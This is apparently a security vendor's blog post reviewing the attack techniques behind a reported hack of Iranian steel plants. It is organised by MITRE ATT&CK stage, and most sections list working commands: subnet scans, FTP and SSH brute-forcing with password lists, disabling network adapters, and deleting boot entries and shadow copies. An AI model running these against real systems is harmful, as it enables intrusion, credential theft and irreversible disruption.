TTPs Reviews In Attack Against The Industry in Iran

TTPs Reviews In Attack Against The Industry in Iran

A major cyberattack has hit the Iranian steel industry today, with hackers claiming to have taken control of systems at three state-owned companies. The incident may be the latest salvo in the escalating cyberwar between Iran and Israel.

The video contains footage which purports to show the hacking group taking control of machinery inside one of the plants.

Initial Access

Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.

Exploit Public-Facing Application

Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet accessible open sockets, such as web servers and related services. Depending on the flaw being exploited this may include Exploitation for Defense Evasion.

  • Shodan
    • vuln:cve-2021-34473 net:5.180.144.0/24
  • Nuclie 
    • uncover -q ‘ssl:”Uber Technologies, Inc.”‘ | httpx -silent | nuclei -t files/ -t tokens/ -t cves/ -pbar -c 100 -o output.txt 
  • Metasploit+Nmap
    • msf > db_nmap –v -sSV -p445 5.180.144.0/24

Valid Accounts

Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.

  • OWASP D4N155
  • Patator
    • ftp_login host=NET0 user=anonymous password=anonymous 0=5.180.144.0/24
    • ftp_login host=NET0 user=FILE1 1=logins.txt password=FILE2 2=rockyou.txt 0=5.180.144.0/24
  • Z668
  • Orbitaldump
    • while read hosts; do python -m orbitaldump -t 10 -u usernames.txt -p passwords.txt -h $hosts –proxies ; done < ssh.txt
  • masscan+naabu
    • masscan 5.180.144.0/24 -p22 > hosts.txt
    • naabu -iL hosts.txt -verify

Privilege Escalation

Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities

Exploitation for Privilege Escalation

  • CVE-2022–26923
  • CVE-2022-26809
  • CVE-2021-34527/CVE-2021-1675
  • CVE-2021-42278/CVE-2021-42278
  • CVE-2021-40449
  • CVE-2021-34527
  • CVE-2020-0796

Valid Accounts

  • net user

Process Injection

  • OpenProcess 
  • VirtualAllocEx 
  • WriteProcessMemory 
  • CreateRemoteThread 
  • GetProcessThread
  • SetThreadContext
  • NtDuplicateToken
  • NtImpersonateThread
  • hHeapCreate
  • hHeapAlloc
  • hRtlCopyMemory
  • hCreateThread
  • SetWindowsHookExA
  • LoadLibraryA
  • RegSetValueExA
  • CreateEventA 
  • SetWindowLongA
  • SendNotifyMessageA
  • VirtualProtect
  • CreateWindowExW

Discovery

Security Software Discovery

  • netsh.exe advfirewall  show allprofiles 
  • tasklist.exe | findstr /i virus
  • %ProgramFiles%\Kaspersky Lab\Kaspersky Endpoint Security <version>

Network Share Discovery

  • net view

Group Policy Discovery

  • gpresult /z

Execution

Execution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery.

Windows Management Instrumentation

  • powershell -Command “Get-WmiObject -class Win32_NetworkAdapter | ForEach { If ($.NetEnabled) { $.Disable() } }” > NUL

Command and Scripting Interpreter

  • powershell -Command \”%exclude_command% ‘%defender_exclusion_folder%

Group Policy Modification

  • Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeAll

Schedule Task/Job

  • SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 23:55

Indicator Removal on Host

  • wevtutil

Impact

Impact consists of techniques that adversaries use to disrupt availability or compromise integrity by manipulating business and operational processes. Techniques used for impact can include destroying or tampering with data. In some cases, business processes can look fine, but may have been altered to benefit the adversaries’ goals. These techniques might be used by adversaries to follow through on their end goal or to provide cover for a confidentiality breach.

Service Stop

  • powershell -Command “Get-WmiObject -class Win32_NetworkAdapter | ForEach { If ($.NetEnabled) { $.Disable() } }” > NUL

Defacement

  • CreateWindowEx

Firmware Corruption

  • for /F “tokens=2” %%j in (‘%comspec% /c “bcdedit -v | findstr identifier”‘) do bcdedit /delete %%j /f
  • C:\\Windows\\system32\\wbem\\wmic.exe shadowcopy delete
  • vssadmin.exe delete shadows /all /quiet

Related Content

CONNECT WITH US

FEATURED ARTICLES

Subscribe

Sign up now to receive the latest notifications and updates from Hadess.

Sign up for News & Communications

Do you want quick & free cyber-security analysis of your application?

Secure your entire workforce, including remote employees.

TRY IT FREE

FOR 15 DAYS